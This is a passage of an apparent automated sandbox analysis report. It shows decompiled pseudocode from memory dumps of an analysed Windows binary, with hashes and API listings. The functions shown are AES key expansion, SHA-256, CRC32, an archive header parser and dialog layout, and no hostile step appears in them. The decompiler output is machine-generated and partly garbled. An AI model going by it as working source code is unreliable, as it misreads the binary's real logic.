							_v29 = _v29 ^  *(( *(_t141 + 0x14 + _t135 * 4) & 0x000000ff) + 0x874130);
							_t96 =  *_t127;
							_v32 = _v32 ^ _t96;
							_v36 = _t127 + 1;
							if(_t135 == 8) {
								_t121 =  &_v28;
								_a4 = 3;
								do {
									_t129 = 4;
									do {
										 *_t121 =  *_t121 ^  *(_t121 - 4);
										_t121 =  &(_t121[0]);
										_t129 = _t129 - 1;
									} while (_t129 != 0);
									_t58 =  &_a4;
									 *_t58 = _a4 - 1;
								} while ( *_t58 != 0);
								_t122 =  &_v12;
								_a4 = 3;
								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0x874130);
								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0x874130);
								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0x874130);
								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0x874130);
								do {
									_t130 = 4;
									do {
										_t96 =  *((intOrPtr*)(_t122 - 4));
										 *_t122 =  *_t122 ^ _t96;
										_t122 =  &(_t122[0]);
										_t130 = _t130 - 1;
									} while (_t130 != 0);
									_t79 =  &_a4;
									 *_t79 = _a4 - 1;
								} while ( *_t79 != 0);
							} else {
								if(_t135 > 1) {
									_t132 =  &_v28;
									_a4 = _t135 - 1;
									do {
										_t124 = 0;
										do {
											_t96 =  *((intOrPtr*)(_t132 + _t124 - 4));
											 *(_t132 + _t124) =  *(_t132 + _t124) ^ _t96;
											_t124 = _t124 + 1;
										} while (_t124 < 4);
										_t132 = _t132 + 4;
										_t53 =  &_a4;
										 *_t53 = _a4 - 1;
									} while ( *_t53 != 0);
								}
							}
							_t131 = 0;
							if(_t135 <= 0) {
								L37:
								_t164 = _t117 - _a4;
							} else {
								while(_t117 <= _a4) {
									if(_t131 >= _t135) {
										L33:
										_t161 = _t133 - 4;
									} else {
										_t96 =  &(( &_v32)[_t131]);
										_a4 = _t96;
										while(_t133 < 4) {
											 *((intOrPtr*)(_t137 + 0x18 + (_t133 + _t117 * 4) * 4)) =  *_t96;
											_t131 = _t131 + 1;
											_t96 = _a4 + 4;
											_t133 = _t133 + 1;
											_a4 = _t96;
											if(_t131 < _t135) {
												continue;
											} else {
												goto L33;
											}
											goto L34;
										}
									}
									L34:
									if(_t161 == 0) {
										_t117 = _t117 + 1;
										_t133 = 0;
									}
									if(_t131 < _t135) {
										continue;
									} else {
										goto L37;
									}
									goto L38;
								}
							}
							L38:
							_t127 = _v36;
						} while (_t164 <= 0);
					}
				} else {
					while(_t117 <= _a4) {
						if(_t126 < _t135) {
							_t139 =  &(( &_v32)[_t126]);
							while(_t133 < 4) {
								_t125 = _t133 + _t117 * 4;
								_t96 =  *_t139;
								_t126 = _t126 + 1;
								_t139 =  &_a4;
								_t133 = _t133 + 1;
								 *(_v40 + 0x18 + _t125 * 4) = _t96;
								_t135 = _v36;
								if(_t126 < _t135) {
									continue;
								}
								break;
							}
							_t137 = _v40;
						}
						if(_t133 == 4) {
							_t117 = _t117 + 1;
							_t133 = 0;
						}
						if(_t126 < _t135) {
							continue;
						} else {
							goto L10;
						}
						goto L39;
					}
				}
				L39:
				return _t96;
			}

0x0083e54c
0x0083e55c
0x0083e55f
0x0083e564
0x0083e568
0x0083e56d
0x0083e570
0x0083e572
0x0083e574
0x0083e578
0x0083e5bf
0x0083e5c2
0x0083e5c8
0x0083e5cd
0x0083e5dc
0x0083e5eb
0x0083e5fa
0x0083e609
0x0083e60d
0x0083e60f
0x0083e614
0x0083e61b
0x0083e64c
0x0083e650
0x0083e658
0x0083e65a
0x0083e65b
0x0083e65e
0x0083e660
0x0083e661
0x0083e661
0x0083e666
0x0083e666
0x0083e666
0x0083e672
0x0083e676
0x0083e684
0x0083e693
0x0083e6a2
0x0083e6b1
0x0083e6b5
0x0083e6b7
0x0083e6b8
0x0083e6b8
0x0083e6bb
0x0083e6bd
0x0083e6be
0x0083e6be
0x0083e6c3
0x0083e6c3
0x0083e6c3
0x0083e61d
0x0083e620
0x0083e629
0x0083e62d
0x0083e631
0x0083e631
0x0083e633
0x0083e633
0x0083e637
0x0083e63a
0x0083e63b
0x0083e640
0x0083e643
0x0083e643
0x0083e643
0x0083e64a
0x0083e620
0x0083e6ca
0x0083e6ce
0x0083e70f
0x0083e70f
0x00000000
0x0083e6d0
0x0083e6d7
0x0083e703
0x0083e703
0x0083e6d9
0x0083e6dd
0x0083e6e0
0x0083e6e4
0x0083e6ee
0x0083e6f2
0x0083e6f7
0x0083e6fa
0x0083e6fb
0x0083e701
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0083e701
0x0083e6e4
0x0083e706
0x0083e706
0x0083e708
0x0083e709
0x0083e709
0x0083e70d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0083e70d
0x0083e6d0
0x0083e712
0x0083e712
0x0083e712
0x0083e5cd
0x00000000
0x0083e57a
0x0083e585
0x0083e58b
0x0083e58f
0x0083e598
0x0083e59b
0x0083e59e
0x0083e59f
0x0083e5a2
0x0083e5a3
0x0083e5a7
0x0083e5ad
0x00000000
0x00000000
0x00000000
0x0083e5ad
0x0083e5af
0x0083e5af
0x0083e5b6
0x0083e5b8
0x0083e5b9
0x0083e5b9
0x0083e5bd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0083e5bd
0x0083e57a
0x0083e723
0x0083e723

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b58e4bcad248253532b889e27a2e567c1f526f5e415f0430c73ab030826cf7c
Instruction ID: f977ec8e6ea4d96185f346c8b2613b7d9dc09224a8bd21d8ed818bf34994db1a
Opcode Fuzzy Hash: 6b58e4bcad248253532b889e27a2e567c1f526f5e415f0430c73ab030826cf7c
Instruction Fuzzy Hash: 0E51E6305093954EC711DF29818446EBFE1FFEA314F49489DE4D987296D230DA45CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 0083F5FB, Relevance: .1, Instructions: 131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E0083F5FB() {
				signed int _t85;
				signed int* _t86;
				unsigned int* _t87;
				void* _t88;
				unsigned int _t90;
				unsigned int _t113;
				signed int _t115;
				signed int* _t120;
				signed int _t121;
				signed int* _t122;
				signed int _t123;
				void* _t135;
				void* _t136;
				void* _t137;
				signed int _t138;
				void* _t140;

				_t120 =  *(_t140 + 0x130);
				_t123 = 0;
				_t86 =  &(_t120[0xa]);
				do {
					 *((intOrPtr*)(_t140 + 0x30 + _t123 * 4)) = E00855644( *_t86);
					_t86 =  &(_t86[1]);
					_t123 = _t123 + 1;
				} while (_t123 < 0x10);
				_t87 = _t140 + 0x68;
				_t137 = 0x30;
				do {
					_t90 =  *(_t87 - 0x34);
					_t113 =  *_t87;
					asm("rol esi, 0xe");
					_t87 =  &(_t87[1]);
					asm("ror eax, 0x7");
					asm("rol eax, 0xd");
					asm("rol ecx, 0xf");
					_t87[1] = (_t90 ^ _t90 ^ _t90 >> 0x00000003) + (_t113 ^ _t113 ^ _t113 >> 0x0000000a) +  *((intOrPtr*)(_t87 - 0x3c)) +  *((intOrPtr*)(_t87 - 0x18));
					_t137 = _t137 - 1;
				} while (_t137 != 0);
				_t88 = 0;
				_t138 = _t120[4];
				_t115 = _t120[5];
				 *(_t140 + 0x10) = _t120[1];
				 *(_t140 + 0x20) = _t120[3];
				 *(_t140 + 0x1c) =  *_t120;
				 *(_t140 + 0x18) = _t120[6];
				_t121 =  *(_t140 + 0x1c);
				 *(_t140 + 0x14) = _t120[2];
				 *(_t140 + 0x24) = _t120[7];
				while(1) {
					 *(_t140 + 0x28) = _t138;
					asm("ror esi, 0xb");
					asm("rol eax, 0x7");
					asm("ror eax, 0x6");
					 *(_t140 + 0x18) = _t115;
					_t33 = _t88 + 0x862780; // 0x64
					_t135 = (_t138 ^ _t138 ^ _t138) + ( !_t138 &  *(_t140 + 0x18) ^ _t115 & _t138) +  *_t33 +  *((intOrPtr*)(_t140 + _t88 + 0x2c));
					_t88 = _t88 + 4;
					_t136 = _t135 +  *(_t140 + 0x24);
					 *(_t140 + 0x24) =  *(_t140 + 0x18);
					_t138 =  *(_t140 + 0x20) + _t136;
					asm("ror edx, 0xd");
					asm("rol eax, 0xa");
					asm("ror eax, 0x2");
					_t85 =  *(_t140 + 0x10);
					 *(_t140 + 0x10) = _t121;
					 *(_t140 + 0x20) =  *(_t140 + 0x14);
					 *(_t140 + 0x14) = _t85;
					_t121 = (_t121 ^ _t121 ^ _t121) + (( *(_t140 + 0x14) ^  *(_t140 + 0x10)) & _t121 ^  *(_t140 + 0x14) &  *(_t140 + 0x10)) + _t136;
					if(_t88 >= 0x100) {
						break;
					}
					_t115 =  *(_t140 + 0x28);
				}
				 *(_t140 + 0x1c) = _t121;
				_t122 =  *(_t140 + 0x130);
				 *_t122 =  *_t122 +  *(_t140 + 0x1c);
				_t122[1] = _t122[1] +  *(_t140 + 0x10);
				_t122[2] = _t122[2] + _t85;
				_t122[3] = _t122[3] +  *(_t140 + 0x20);
				_t122[5] = _t122[5] +  *(_t140 + 0x28);
				_t122[6] = _t122[6] +  *(_t140 + 0x18);
				_t122[4] = _t122[4] + _t138;
				_t122[7] = _t122[7] +  *(_t140 + 0x24);
				return _t85;
			}

0x0083f605
0x0083f60c
0x0083f60e
0x0083f611
0x0083f618
0x0083f61c
0x0083f61f
0x0083f621
0x0083f628
0x0083f62c
0x0083f62d
0x0083f62d
0x0083f632
0x0083f636
0x0083f639
0x0083f63c
0x0083f64a
0x0083f64d
0x0083f65f
0x0083f662
0x0083f662
0x0083f66a
0x0083f66e
0x0083f671
0x0083f674
0x0083f67b
0x0083f682
0x0083f689
0x0083f690
0x0083f694
0x0083f698
0x0083f6a2
0x0083f6a4
0x0083f6a8
0x0083f6ad
0x0083f6bc
0x0083f6d1
0x0083f6d5
0x0083f6dd
0x0083f6e1
0x0083f6e4
0x0083f6e8
0x0083f6ec
0x0083f6ee
0x0083f6f3
0x0083f6fa
0x0083f711
0x0083f717
0x0083f71f
0x0083f723
0x0083f727
0x0083f730
0x00000000
0x00000000
0x0083f69e
0x0083f69e
0x0083f736
0x0083f73a
0x0083f745
0x0083f74b
0x0083f750
0x0083f757
0x0083f75e
0x0083f765
0x0083f768
0x0083f76f
0x0083f77c

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b53f485c255afbd291275d775bf63dd680a7592f80a1896200e4f4ffffb11ee
Instruction ID: f746b3f821fa5524cdde5a6deec5a721644d1b7a3f057057c2425ed2b5323915
Opcode Fuzzy Hash: 7b53f485c255afbd291275d775bf63dd680a7592f80a1896200e4f4ffffb11ee
Instruction Fuzzy Hash: 935124B1A083068BC748CF19D49055AF7E1FBC8314F054A2EE899E7741DB34E959CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 00843446, Relevance: .1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00843446(unsigned int __ecx) {
				intOrPtr _t39;
				signed int _t47;
				intOrPtr _t48;
				signed int _t55;
				signed int _t61;
				signed int _t66;
				intOrPtr _t78;
				signed int _t82;
				unsigned char _t84;
				signed int* _t86;
				intOrPtr _t87;
				unsigned int _t88;
				unsigned int _t89;
				signed int _t90;
				void* _t91;

				_t88 =  *(_t91 + 0x1c);
				_t61 = 0;
				_t86 =  *(_t91 + 0x24);
				_t89 = __ecx;
				 *(_t91 + 0x14) = __ecx;
				_t86[3] = 0;
				if( *((intOrPtr*)(_t88 + 8)) != 0 ||  *_t88 <=  *((intOrPtr*)(__ecx + 0x84)) - 7 || E00844495(__ecx) != 0) {
					E0083A575(_t88,  ~( *(_t88 + 4)) & 0x00000007);
					 *(_t91 + 0x14) = E0083A58C(_t88) >> 8;
					E0083A575(_t88, 8);
					_t66 =  *(_t91 + 0x10) & 0x000000ff;
					_t39 = (_t66 >> 0x00000003 & 0x00000003) + 1;
					 *((intOrPtr*)(_t91 + 0x20)) = _t39;
					if(_t39 == 4) {
						goto L3;
					}
					_t86[3] = _t39 + 2;
					_t86[1] = (_t66 & 0x00000007) + 1;
					 *(_t91 + 0x1c) = E0083A58C(_t88) >> 8;
					E0083A575(_t88, 8);
					if( *((intOrPtr*)(_t91 + 0x20)) <= _t61) {
						L9:
						_t84 =  *(_t91 + 0x10);
						 *_t86 = _t61;
						if((_t61 >> 0x00000010 ^ _t61 >> 0x00000008 ^ _t61 ^ _t84 ^ 0x0000005a) !=  *((intOrPtr*)(_t91 + 0x18))) {
							goto L3;
						}
						_t47 =  *_t88;
						_t86[2] = _t47;
						_t23 = _t47 - 1; // -1
						_t48 =  *((intOrPtr*)(_t89 + 0x88));
						_t78 = _t23 + _t61;
						if(_t48 >= _t78) {
							_t48 = _t78;
						}
						 *((intOrPtr*)(_t89 + 0x88)) = _t48;
						_t86[4] = _t84 >> 0x00000006 & 0x00000001;
						_t86[4] = _t84 >> 7;
						return 1;
					}
					_t87 =  *((intOrPtr*)(_t91 + 0x20));
					_t90 = _t61;
					do {
						_t55 = E0083A58C(_t88) >> 8 << _t90;
						_t90 = _t90 + 8;
						_t61 = _t61 + _t55;
						_t82 =  *(_t88 + 4) + 8;
						 *_t88 =  *_t88 + (_t82 >> 3);
						 *(_t88 + 4) = _t82 & 0x00000007;
						_t87 = _t87 - 1;
					} while (_t87 != 0);
					_t86 =  *(_t91 + 0x24);
					_t89 =  *(_t91 + 0x14);
					goto L9;
				} else {
					L3:
					return 0;
				}
			}

0x0084344c
0x00843450
0x00843453
0x00843457
0x00843459
0x0084345d
0x00843463
0x0084348d
0x008434a0
0x008434a4
0x008434ad
0x008434b8
0x008434b9
0x008434c0
0x00000000
0x00000000
0x008434c9
0x008434cc
0x008434dd
0x008434e1
0x008434ea
0x00843525
0x00843525
0x00843535
0x00843542
0x00000000
0x00000000
0x00843548
0x0084354a
0x0084354d
0x00843550
0x00843556
0x0084355a
0x0084355c
0x0084355c
0x0084355e
0x0084356e
0x00843573
0x00000000
0x00843573
0x008434ec
0x008434f0
0x008434f2
0x008434fe
0x00843500
0x00843506
0x00843508
0x00843513
0x00843515
0x00843518
0x00843518
0x0084351d
0x00843521
0x00000000
0x0084347b
0x0084347b
0x00000000
0x0084347b

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32fd5146a60738f57232f45508c71c5fad50b2970f081f721f909f7bc4e013ae
Instruction ID: 9d9caf8524b3397fa3b28d04df9eb626d2e015f36c697a35975ede83dde23767
Opcode Fuzzy Hash: 32fd5146a60738f57232f45508c71c5fad50b2970f081f721f909f7bc4e013ae
Instruction Fuzzy Hash: F531B2B57047199FCB18DF28C8512AABBE0FB95304F10492DE4DAD7741C739EA09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00835EAB, Relevance: .1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00835EAB(signed char _a4, signed char _a8, unsigned int _a12) {
				signed char _t49;
				signed char _t51;
				signed char _t67;
				signed char _t68;
				unsigned int _t72;
				unsigned int _t74;

				_t67 = _a8;
				_t49 = _a4;
				_t74 = _a12;
				if(_t74 != 0) {
					while((_t67 & 0x00000007) != 0) {
						_t49 = _t49 >> 0x00000008 ^  *(0x86e040 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
						_t67 = _t67 + 1;
						_a8 = _t67;
						_t74 = _t74 - 1;
						if(_t74 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				if(_t74 >= 8) {
					_t72 = _t74 >> 3;
					do {
						_t51 = _t49 ^  *_t67;
						_t74 = _t74 - 8;
						_t68 =  *(_t67 + 4);
						_t67 = _a8 + 8;
						_a8 = _t67;
						_t49 =  *(0x86e040 + (_t68 >> 0x18) * 4) ^  *(0x86e440 + (_t68 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x86e840 + (_t68 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x86f040 + (_t51 >> 0x18) * 4) ^  *(0x86f440 + (_t51 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x86f840 + (_t51 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x86ec40 + (_t68 & 0x000000ff) * 4) ^  *(0x86fc40 + (_t51 & 0x000000ff) * 4);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
				}
				if(_t74 != 0) {
					do {
						_t49 = _t49 >> 0x00000008 ^  *(0x86e040 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
						_t67 = _t67 + 1;
						_t74 = _t74 - 1;
					} while (_t74 != 0);
				}
				return _t49;
			}

0x00835eae
0x00835eb2
0x00835eb6
0x00835ebb
0x00835ebd
0x00835ecd
0x00835ed4
0x00835ed5
0x00835ed8
0x00835edb
0x00000000
0x00000000
0x00000000
0x00835edb
0x00835ebd
0x00835edd
0x00835ee0
0x00835ee9
0x00835eec
0x00835eec
0x00835eee
0x00835ef1
0x00835f4e
0x00835f51
0x00835f65
0x00835f67
0x00835f67
0x00835f6c
0x00835f6f
0x00835f71
0x00835f7c
0x00835f83
0x00835f84
0x00835f84
0x00835f71
0x00835f8e

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d273660321f89f5ab94be420e67dae406c32dac64f1dadfed3c965801588fde
Instruction ID: 2d126c6016182dde29488afbad02406c8ecd331454cd643a96ad2083cab3dbd0
Opcode Fuzzy Hash: 3d273660321f89f5ab94be420e67dae406c32dac64f1dadfed3c965801588fde
Instruction Fuzzy Hash: 6721D735A204758FCB08CF2DED9083A7350F79630174B812BEA46DF691D578E925C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0083D754, Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 235
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0083D754(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t96;
				signed int _t104;
				struct HWND__* _t106;
				signed int _t119;
				signed int _t134;
				void* _t150;
				void* _t155;
				char _t156;
				void* _t157;
				signed int _t158;
				intOrPtr _t160;
				void* _t163;
				void* _t169;
				long _t170;
				signed int _t174;
				signed int _t185;
				struct HWND__* _t186;
				struct HWND__* _t187;
				void* _t188;
				void* _t191;
				signed int _t192;
				long _t193;
				void* _t200;
				int* _t201;
				struct HWND__* _t202;
				void* _t204;
				void* _t205;
				void* _t207;
				void* _t209;
				void* _t213;

				_t202 = __ecx;
				_v2368.bottom = __ecx;
				E00833F53( &_v2208, 0x50, L"$%s:", _a8);
				_t207 =  &_v2368 + 0x10;
				E00841222( &_v2208,  &_v2288, 0x50);
				_t96 = E00852C10( &_v2300);
				_t186 = _v8;
				_t155 = 0;
				_v2376 = _t96;
				_t209 =  *0x86d5f4 - _t155; // 0x63
				if(_t209 <= 0) {
					L8:
					_t156 = E0083CDCF(_t155, _t202, _t188, _t213, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t156;
					GetWindowRect(_t186,  &_v2352);
					GetClientRect(_t186,  &(_v2320.top));
					_t169 = _v2352.right - _v2352.left + 1;
					_t104 = _v2320.bottom;
					_t191 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t204 = _t191 - _v2304;
					_v2368.bottom = _t169 - _t104;
					if(_t156 == 0) {
						L15:
						_t221 = _a12;
						if(_a12 == 0 && E0083CE49(_t156, _v2368.bottom, _t221, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t186,  &_v2048);
						}
						L18:
						_t205 = _t204 - GetSystemMetrics(8);
						_t106 = GetWindow(_t186, 5);
						_t187 = _t106;
						_v2368.bottom = _t187;
						if(_t156 == 0) {
							L24:
							return _t106;
						}
						_t157 = 0;
						while(_t187 != 0) {
							__eflags = _t157 - 0x200;
							if(_t157 >= 0x200) {
								goto L24;
							}
							GetWindowRect(_t187,  &_v2320);
							_t170 = _v2320.top.left;
							_t192 = 0x64;
							asm("cdq");
							_t193 = _v2320.left;
							asm("cdq");
							_t119 = (_t170 - _t205 - _v2336) * _v2368.top;
							asm("cdq");
							_t174 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0x86dfd0(_t187, 0, (_t193 - (_v2352.right - _t119 % _t174 >> 1) - _v2352.bottom) * _v2368.right / _t174, _t119 / _t174, (_v2320.right - _t193 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t170 + 1) * _v2368.top / _t192, 0x204);
							_t106 = GetWindow(_t187, 2);
							_t187 = _t106;
							__eflags = _t187 - _v2384;
							if(_t187 == _v2384) {
								goto L24;
							}
							_t157 = _t157 + 1;
							__eflags = _t157;
						}
						goto L24;
					}
					if(_a12 != 0) {
						goto L18;
					}
					_t158 = 0x64;
					asm("cdq");
					_t134 = _v2292 * _v2368.top;
					_t160 = _t104 * _v2368.right / _t158 + _v2352.right;
					_v2324 = _t160;
					asm("cdq");
					_t185 = _t134 % _v2352.top;
					_v2352.left = _t134 / _v2352.top + _t204;
					asm("cdq");
					asm("cdq");
					_t200 = (_t191 - _v2352.left - _t185 >> 1) + _v2336;
					_t163 = (_t169 - _t160 - _t185 >> 1) + _v2352.bottom;
					if(_t163 < 0) {
						_t163 = 0;
					}
					if(_t200 < 0) {
						_t200 = 0;
					}
					 *0x86dfd0(_t186, 0, _t163, _t200, _v2324, _v2352.left,  !(GetWindowLongW(_t186, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
					GetWindowRect(_t186,  &_v2368);
					_t156 = _v2393;
					goto L15;
				} else {
					_t201 = 0x86d154;
					do {
						if( *_t201 > 0) {
							_t9 =  &(_t201[1]); // 0x8633e0
							_t150 = E008554A0( &_v2288,  *_t9, _t96);
							_t207 = _t207 + 0xc;
							if(_t150 == 0) {
								_t12 =  &(_t201[1]); // 0x8633e0
								if(E0083CFA0(_t155, _t202, _t201,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t186,  *_t201,  &_v2048);
								}
							}
							_t96 = _v2368.top;
						}
						_t155 = _t155 + 1;
						_t201 =  &(_t201[3]);
						_t213 = _t155 -  *0x86d5f4; // 0x63
					} while (_t213 < 0);
					goto L8;
				}
			}

0x0083d76c
0x0083d776
0x0083d77a
0x0083d77f
0x0083d791
0x0083d79b
0x0083d7a0
0x0083d7a7
0x0083d7aa
0x0083d7ae
0x0083d7b4
0x0083d811
0x0083d829
0x0083d831
0x0083d835
0x0083d841
0x0083d853
0x0083d85a
0x0083d85e
0x0083d861
0x0083d869
0x0083d86f
0x0083d875
0x0083d916
0x0083d916
0x0083d91e
0x0083d94f
0x0083d94f
0x0083d955
0x0083d960
0x0083d962
0x0083d968
0x0083d96a
0x0083d970
0x0083da22
0x0083da22
0x0083da22
0x0083d976
0x0083da10
0x0083d97d
0x0083d983
0x00000000
0x00000000
0x0083d98f
0x0083d999
0x0083d9ae
0x0083d9b3
0x0083d9b6
0x0083d9cc
0x0083d9d4
0x0083d9d6
0x0083d9d7
0x0083d9df
0x0083d9f1
0x0083d9f8
0x0083da01
0x0083da07
0x0083da09
0x0083da0d
0x00000000
0x00000000
0x0083da0f
0x0083da0f
0x0083da0f
0x00000000
0x0083da10
0x0083d883
0x00000000
0x00000000
0x0083d890
0x0083d891
0x0083d89a
0x0083d89f
0x0083d8a5
0x0083d8a9
0x0083d8aa
0x0083d8b0
0x0083d8ba
0x0083d8c1
0x0083d8ca
0x0083d8ce
0x0083d8d2
0x0083d8d4
0x0083d8d4
0x0083d8d8
0x0083d8da
0x0083d8da
0x0083d900
0x0083d90c
0x0083d912
0x00000000
0x0083d7b6
0x0083d7b6
0x0083d7bb
0x0083d7be
0x0083d7c1
0x0083d7c9
0x0083d7ce
0x0083d7d3
0x0083d7e4
0x0083d7ee
0x0083d7fb
0x0083d7fb
0x0083d7ee
0x0083d801
0x0083d801
0x0083d805
0x0083d806
0x0083d809
0x0083d809
0x00000000
0x0083d7bb

APIs

_swprintf.LIBCMT ref: 0083D77A

Part of subcall function 00833F53: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00833F66

Part of subcall function 00841222: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000400,00000000,00000000,?,0Z,00000400,0083CEDA,00000000,?,00000050,0Z), ref: 0084123F

_strlen.LIBCMT ref: 0083D79B
SetDlgItemTextW.USER32(?,0086D154,?), ref: 0083D7FB
GetWindowRect.USER32(?,?), ref: 0083D835
GetClientRect.USER32(?,?), ref: 0083D841
GetWindowLongW.USER32(?,000000F0), ref: 0083D8DF
GetWindowRect.USER32(?,?), ref: 0083D90C
SetWindowTextW.USER32(?,?), ref: 0083D94F
GetSystemMetrics.USER32(00000008), ref: 0083D957
GetWindow.USER32(?,00000005), ref: 0083D962
GetWindowRect.USER32(00000000,?), ref: 0083D98F
GetWindow.USER32(00000000,00000002), ref: 0083DA01

Strings

d, xrefs: 0083D861
CAPTION, xrefs: 0083D931
$%s:, xrefs: 0083D76E

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: f3f28e10ae020be253f64a74bf50287a460b9f0fd48d890a16731879a717282c
Instruction ID: 78666e8c29cae57682ee1bb6384debd2c843650cdc047206e3065b18f1e8e6be
Opcode Fuzzy Hash: f3f28e10ae020be253f64a74bf50287a460b9f0fd48d890a16731879a717282c
Instruction Fuzzy Hash: 9581AE71608341AFD710DF68DD89B6FBBE9FBC8704F05192DF985E7290D6B0A8098B52

Uniqueness

Uniqueness Score: -1.00%

Function 0085B7DF, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0085B7DF(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x86dd50) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00857AC6(_t46);
							E0085B3BE( *((intOrPtr*)(_t74 + 0x88)));
						}
